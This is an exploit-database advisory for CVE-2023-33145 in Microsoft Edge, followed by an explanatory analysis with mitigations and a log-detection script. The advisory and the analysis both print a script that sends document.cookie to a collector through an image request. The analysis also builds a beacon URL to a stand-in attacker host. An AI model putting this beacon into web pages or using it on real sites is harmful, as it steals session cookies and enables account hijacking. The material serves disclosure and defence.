Microsoft Edge 114.0.1823.67 (64-bit) - Information Disclosure

Exploit Author: nu11secur1ty
Analysis Author: www.bubbleslearn.ir
Category: Local
Language: JavaScript
Published Date: 2023-07-06

## Title: Microsoft Edge 114.0.1823.67 (64-bit) - Information Disclosure
## Author: nu11secur1ty
## Date: 07.06.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en-us/edge?form=MA13FJ&exp=e415
## Reference: https://portswigger.net/web-security/information-disclosure,
https://www.softwaresecured.com/stride-threat-modeling/
## CVE-2023-33145



## Description:
The type of information that could be disclosed if an attacker
successfully exploited this vulnerability is data inside the targeted
website, such as IDs, tokens, nonces, cookies, the IP address, the
User-Agent string and other sensitive information.
The user would have to click on a specially crafted URL to be
compromised by the attacker.
In this example the attacker uses STRIDE threat modeling (the Spoofing
category) to lure the victim into clicking a link to his website, and
that is all it takes.
This will be hard to detect.

## Conclusion:
Please be careful with suspicious sites, and be careful about who sends
you a link to open!

## Status: HIGH Vulnerability

[+]Exploit:

- Exploit Server:

```html
<!-- This is the GET request the victim's browser sends to the attacker's
     server when the victim clicks! And it is enough to understand this
     vulnerability! =) -->

<!-- Beacon: assigning src to an Image object makes the browser fetch the
     URL immediately; the page's script-readable cookies ride along in the
     query string. -->
<script>
  var i = new Image();
  i.src = "PoCsess.php?cookie=" + escape(document.cookie);
</script>

<!-- WARNING: PoCsess.php will not be uploaded, for security reasons! -->
<!-- BR nu11secur1ty -->
```

## Reproduce:
[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33146)

## Proof and Exploit
[href](https://www.nu11secur1ty.com/2023/07/cve-2023-33145-microsoft-edge.html)

## Time spent:
01:30:00


CVE-2023-33145: Microsoft Edge 114.0.1823.67 (64-bit) – Information Disclosure Vulnerability

Microsoft Edge, one of the most widely used web browsers, has been reported to contain a high-severity information disclosure vulnerability tracked as CVE-2023-33145. The flaw was reported by security researcher nu11secur1ty in an advisory published on July 6, 2023 (the advisory's "07.06.2023" is day.month.year), and it exposes sensitive user data through a seemingly innocuous mechanism: a click on a crafted URL.

Understanding the Vulnerability

The vulnerability is described as a client-side information leak in Microsoft Edge version 114.0.1823.67 (64-bit). When a user opens a maliciously crafted link, script on the page the link leads to reads data available to it (the advisory lists cookies, session tokens, nonces, the IP address, the User-Agent string and other session-specific identifiers) and sends it to a remote server without any further consent or warning.

This behaviour is dangerous because it rides on the most common user interaction there is: clicking a link. Attackers can deliver it through phishing, disguised links or malicious advertisements, and the victim sees nothing unusual, which makes detection difficult.

Exploitation Mechanism: STRIDE Threat Modeling in Action

nu11secur1ty frames the attack with STRIDE threat modeling, a widely adopted framework for classifying threats. STRIDE stands for Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service and Elevation of Privilege. Here the Spoofing category describes luring the victim onto the attacker's page, and the Information Disclosure category describes the resulting leak.

The attacker's page carries a <script> that silently sends the victim's data to a remote server through an image request: the browser fetches whatever URL is assigned to the src of an Image object, and that URL is built so that it carries the data in its query string.


```js
var i = new Image();
i.src = "PoCsess.php?cookie=" + escape(document.cookie);
```

Explanation: the snippet creates an Image object and sets its src to a collector endpoint (PoCsess.php, which the advisory does not publish). As soon as src is assigned, the browser issues an HTTP GET for that URL, so the document.cookie value travels in the query string; the element does not need to be in the DOM and nothing is rendered. Two details matter in practice. First, document.cookie only returns the cookies of the origin the script is running in, and never cookies flagged HttpOnly, so the script has to execute in the context of the targeted site for that site's cookies to be exposed. Second, escape() is a deprecated encoder: it leaves '+', '/', '@' and '*' unencoded and emits non-standard %uXXXX sequences for non-Latin-1 characters, so a '+' inside a cookie value is decoded as a space by the collector; encodeURIComponent() is the correct choice.

Because the request is initiated by the browser itself as an ordinary image fetch, no cross-origin restriction stops it: CORS governs whether script may read a cross-origin response, not whether the browser may send the request, and the attacker never needs to read the response. Nothing beyond opening the link is required, no warning is shown, and in proxy or web-server logs the beacon looks like any other image GET, so it is easily missed unless query strings are inspected. Only a Content Security Policy on the page (img-src or connect-src restricting destinations) or cookies the script cannot read (HttpOnly) get in the way.
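The following is an added example, not code from the advisory or from the analysis author. It models offline what the beacon above does end to end: it builds the collector URL the way the PoC does (with both the deprecated escape() and encodeURIComponent()), decodes it the way a collector endpoint would, and then scans access-log lines for cookie-shaped query values, which is the check a defender would run over proxy or web-server logs. The cookie string, the collector path (https://attacker.example/PoCsess.php) and the log lines are all constructed for illustration.

```javascript
// Added example (not the advisory's code): beacon construction, collector-side
// decoding and log-based detection for a document.cookie exfiltration.
// Cookie string, collector URL and log lines are constructed for illustration.

// Shaped like what document.cookie returns for a page whose session cookie is
// NOT HttpOnly (HttpOnly cookies never appear in document.cookie).
const SAMPLE_DOCUMENT_COOKIE = "PHPSESSID=abc123; csrf_token=9f8e+7d6c; theme=dark";

// What the PoC does with `i.src = "PoCsess.php?cookie=" + escape(document.cookie)`.
// encodeURIComponent is the correct encoder: escape() leaves '+', '/', '@' and
// '*' untouched and emits non-standard %uXXXX for non-Latin-1 text.
function buildBeaconUrl(collector, cookieString, encoder = encodeURIComponent) {
  return collector + "?cookie=" + encoder(cookieString);
}

// What a collector recovers from the GET. URLSearchParams decodes the query as
// application/x-www-form-urlencoded, so a literal '+' left behind by escape()
// comes back as a space and the cookie value is silently corrupted.
function extractCookieParam(url) {
  return new URL(url).searchParams.get("cookie");
}

// Detection side: access-log lines in common log format (constructed).
const SAMPLE_LOG = [
  '203.0.113.5 - - [06/Jul/2023:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512',
  '203.0.113.5 - - [06/Jul/2023:10:00:02 +0000] "GET /PoCsess.php?cookie=PHPSESSID%3Dabc123%3B%20csrf_token%3D9f8e%2B7d6c HTTP/1.1" 200 0',
  '198.51.100.7 - - [06/Jul/2023:10:00:03 +0000] "GET /search?q=cookies%20recipe HTTP/1.1" 200 2048',
];

// A decoded query value that looks like "name=value; name=value", or that
// carries a session-like cookie name, is a strong sign of a document.cookie beacon.
const COOKIE_LIST_SHAPE = /^[^=;\s]+=[^;]*(;\s*[^=;\s]+=[^;]*)+$/;
const SESSION_NAME_HINT = /(?:^|;\s*)[^=;]*(?:sess|sid|token|auth)[^=;]*=/i;

// Returns one hit per suspicious query parameter: { line, param, value }.
function findCookieExfil(logLines) {
  const hits = [];
  for (const line of logLines) {
    const m = line.match(/"GET (\S+) HTTP\/[\d.]+"/);
    if (!m) continue;
    // The log stores a path, so resolve against a placeholder base to parse it.
    const params = new URL(m[1], "http://placeholder.invalid/").searchParams;
    for (const [name, value] of params) {
      if (COOKIE_LIST_SHAPE.test(value) || SESSION_NAME_HINT.test(value)) {
        hits.push({ line, param: name, value });
      }
    }
  }
  return hits;
}

// Stand-alone run: show the encoder difference and the log hits.
if (typeof require !== "undefined" && require.main === module) {
  const collector = "https://attacker.example/PoCsess.php";
  console.log("escape():           ", extractCookieParam(buildBeaconUrl(collector, SAMPLE_DOCUMENT_COOKIE, escape)));
  console.log("encodeURIComponent:", extractCookieParam(buildBeaconUrl(collector, SAMPLE_DOCUMENT_COOKIE)));
  console.log(findCookieExfil(SAMPLE_LOG));
}
```

The detector deliberately looks at decoded parameter values rather than parameter names: an attacker can call the parameter anything, but a value that decodes to a cookie list is hard to disguise without also changing the collector to decode it differently.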

Real-World Implications and Use Cases

Consider a scenario where a user receives a seemingly harmless link via email, social media, or a compromised website:

  • Phishing email: "Click here to claim your reward!" – the link redirects to a malicious site that silently captures session cookies.
  • Malicious ad: An advertisement on a legitimate site that triggers the exploit when clicked.
  • QR code: A physical QR code that leads to a page with the exploit code, used in physical social engineering attacks.

Once the attacker collects the document.cookie, they can:

  • Steal active session tokens
  • Impersonate the user on authenticated websites
  • Access private data or perform unauthorized actions

Why This is a High-Risk Vulnerability

CVE-2023-33145 is rated High severity because of the following factors:

| Factor | Description |
|---|---|
| Attack vector | Remote, user-initiated: the victim only has to open a link |
| Exploit complexity | Low: a crafted URL and a few lines of script |
| Impact | High: session hijacking if session cookies are readable by script |
| Detection difficulty | High: no browser warning and no visible payload; the beacon is an ordinary image GET, visible only in request logs |

Moreover, the exploit does not require any persistent malware or advanced technical skills. It relies solely on user behavior, making it highly effective in real-world environments.

Mitigation and Best Practices

The advisory does not point to a fix for the build it names, so users and organizations should rely on the following measures regardless of patch status:

  • Disable automatic image loading in the browser (where supported). This removes only one carrier: the same beacon can be sent with fetch(), a form submission or a navigation, so treat it as a minor hardening step.
  • Use ad blockers and phishing detection tools (for example uBlock Origin or the browser's built-in protection).
  • Verify URLs before clicking, especially from unknown sources.
  • Serve a strict Content Security Policy: script-src without 'unsafe-inline' so injected inline script does not run, and img-src / connect-src allow-lists so the page cannot send requests to arbitrary origins.
  • Mark session cookies HttpOnly (they then never appear in document.cookie), Secure and SameSite, and keep sessions short-lived and revocable. Multi-factor authentication protects the login, not a session that has already been issued, so on its own it does not defend against cookie theft.

For developers, the takeaway is that any element that makes the browser issue a request, an <img> included, is a potential exfiltration channel. Encode untrusted data for the context it is written into so that script cannot be injected, keep secrets out of what script can read, and use CSP to restrict where the page may send requests.

Conclusion

CVE-2023-33145 is a reminder that client-side data exposure needs no elaborate exploit: a link, a few lines of script and a cookie that script can read are enough. As browsers and web applications gain features, the attack surface grows, and developers and users alike must remain vigilant.

Always ask: “What data is being sent when I click a link?” and “Who is receiving it?”. In today’s digital landscape, the simplest click can be the most dangerous.